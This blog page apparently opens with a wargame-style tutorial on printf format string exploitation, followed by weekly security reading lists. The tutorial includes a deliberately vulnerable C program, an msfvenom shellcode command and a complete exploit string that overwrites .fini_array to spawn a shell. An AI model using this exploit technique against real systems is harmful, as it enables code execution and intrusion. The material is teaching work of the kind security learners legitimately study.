printf Format String Exploitation

The format string in a printf call controls how the function interprets its arguments and what it outputs, so an attacker who controls it can exploit the application in various ways. Specifically, an attacker can read and write arbitrary memory.

Reading memory can be accomplished through the usual conversion specifiers (%x, %p, %s), and the POSIX positional syntax %<x>$ lets you jump through the stack to arbitrary positions (as a multiple of the addressing size, anyway). The %n format specifier lets you write to a memory address: the value at that point on the stack is taken as an int *, and the number of bytes output so far is written to that address. So we can write a value of our choosing by making printf output exactly that many bytes first.

I’ll discuss exploitation with a simple example, as you might see in a wargame.

Basic steps:

  1. Figure out where your buffer is on the stack.
  2. Figure out where you want to write.
  3. Figure out what you want to write.
  4. Put the exploit together.

Here’s what we’ll use for our sample vulnerable program. For this simple case, I’ve marked the stack executable and am using a system with ASLR disabled.

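#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if(argc < 2) return 1;

    /* strncpy does not terminate on truncation, so do it explicitly */
    strncpy(buf, argv[1], BUF_SIZE-1);
    buf[BUF_SIZE-1] = '\0';

    /* the vulnerability: attacker-controlled data used as the format string */
    printf(buf);

    return 0;
}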

Let’s figure out where our buffer is on the stack, relative to the stack frame of the printf call. It’s easy enough to do: supply something like AAAA%<x>$p where <x> is an argument position, starting from 1 and going up. When you see ‘AAAA0x41414141’ as your output, you’ve found the start of your format string. In this case, the format string is 6 words up the stack, so %6$ refers to its first four bytes.

So, since we can write to memory, where do we want to write? We need something that will be executed after the printf, which severely limits our options. The first option that comes to mind is to overwrite the saved EIP, but most likely we don’t know the exact address where that’s saved, and the stack can shift around quite easily (due to argument lengths, environment variables, etc.). What about something more fixed?

Linux ELF binaries contain a section known as .fini_array, which is defined as “an array of function pointers that contributes to a single termination array for the executable or shared object containing the section.” In a simple binary like this, this section contains only a single function pointer, but that’s ok, because we can overwrite this pointer to point to our shellcode. Since the binary exits almost immediately after calling printf, there’s no problem in waiting for the .fini_array pointers to be called. With objdump -h, we can see the section headers, and find our section:

$ objdump -h printf
 19 .fini_array   00000004  080495b0  080495b0  000005b0  2**2
                  CONTENTS, ALLOC, LOAD, DATA

As expected, it’s 4 bytes long, and located at 0x080495b0, so now we have our address to overwrite.

So what do we want to write there? Clearly the address of our shellcode. We could write our shellcode to the printf buffer, but we’d need to get that address just right, or perhaps include a large nopsled. My favorite trick is to store the shellcode in an environment variable. It’s easy to predict the address (if you don’t change the environment) by writing a small program to spit it out, and, if you don’t feel like writing your own shellcode, msfvenom will provide you with a convenient shellcode in bash form: msfvenom -p linux/x86/exec CMD=/bin/sh -f bash -b '\x00'.

So, stick your shellcode into an environment variable and get its address. So long as the environment doesn’t change, that address will remain constant for programs invoked from that shell (the length of the program’s path shifts it as well, so measure it from a program with a name of the same length). In my case, I got 0xffffdef2. Because the value is far too large to produce as a single output count, I’ll split it into two 16-bit writes, but the %n specifier always writes an int at a time (32 bits), so we have to do it carefully to avoid overwriting ourselves!

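Writing from lower to higher works (we’re on a little-endian system, remember!): we write 0xdef2 to the lower address, then 0xffff to the address two bytes above it, so the second write replaces the two zero bytes the first one left in the upper half. Let’s start constructing our format string. First, we need both addresses at the start of the buffer: the lowest address and the one two bytes past it. Then we output our first value minus 8 bytes (the two addresses have already produced 8 bytes of output), write the count to memory with %n, and repeat for the second value, padding only by the difference because the count keeps accumulating.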

The general format at this point is: <destination address><destination address + 2>%<0xdef2 - 8>c%6$n%<0xffff-0xdef2>c%7$n

Putting it together:
$ ./printf $'\xb0\x95\x04\x08\xb2\x95\x04\x08%57066c%6$n%8461c%7$n'
sh$

Weekly Reading List for 2/8/14

Android Pentesting Guides

I’ve been reading a lot about Android pentesting this week, so rather than summarizing each one, here’s a list of useful reading for Android pentesting.

Useful Lab Settings

Maybe you want to test something with an executable stack, ASLR off, or otherwise disable some security feature? This article describes settings for NX, ASLR, and SSP on Linux boxes. More details here.

OWASP Security Testing Guide

I can’t believe I didn’t know about OWASP’s security testing guide before. Though it was published a few years ago, it’s pretty much still relevant, and they’re working on a v4.0.

Weekly Reading List for 2/1/14

Previews for BSides SF 2014

A couple of new articles have been posted with previews of this year’s BSides San Francisco. Akamai has a preview of several talks and Tripwire previews a day in the life of an information security researcher.

Application Whitelist Bypass

@infosecsmith2 guest posts over at Room362 about using IEexec.exe to bypass application whitelisting.

Custom Wordlists

Chief Monkey over at IT Security Toolbox reports on a tool called SmeegeScrape that allows you to build a wordlist from the contents of a system. He reports on it in the context of a forensics task, but it seems like it would be a great option for penetration testing as well.

Encryption with Plausible Deniability

Michael Mimoso at ThreatPost describes a new encryption mechanism called ‘Honey Encryption’. The idea is that an attacker can get a plausible decryption output from a wrong password, making it harder to know if a decryption was valid when performing offline attacks.

The reading list is a little short this week – it’s been crazy.

Weekly Reading List for 1/25/14

This week, we’re focusing on binary exploitation and reversing. (Thanks to Ghost in the Shellcode for making me feel stupid with all their binary pwning challenges!)

Basic Shellcode Examples

Gal Badishi has a great set of Basic Shellcode Examples. It’s almost two years old, but a good primer on how basic shellcode works. x86 hasn’t changed (yes, I’m ignoring x64 for now), so it’s still quite a relevant resource for those of us who have leaned on msfvenom/msfpayload for our payload needs.

Project Shellcode

Going beyond the basic, Project Shellcode is a site full of resources for crafting and understanding shellcode. Based on training classes used at BlackHat 2012, they walk through all the steps in writing shellcode.

x86 Assembly Guide

If the shellcode above looked like Greek, perhaps it’s time for an x86 assembly primer/refresher. UVA’s CS department has you covered with their x86 Assembly Guide, used in their CS216 class. It also serves as a useful reference on how the instructions work.

GNU Debugger Tutorial

If you want to observe the behavior of a running program, you’re going to want a debugger. If you’re running on Linux and haven’t spent the $1200 for IDA Pro, you’re probably using the GNU Debugger, better known as GDB. RMS (no, not that RMS) has a great gdb tutorial.

Ghost in the Shellcode 2014

A quick Ghost in the Shellcode 2014 summary. Great CTF, but you better know your binary exploitation. I’m pretty happy with the 27th-place overall finish Shadow Cats managed. Here’s a summary of our team writeups, the first 3 by me, the last one by Dan.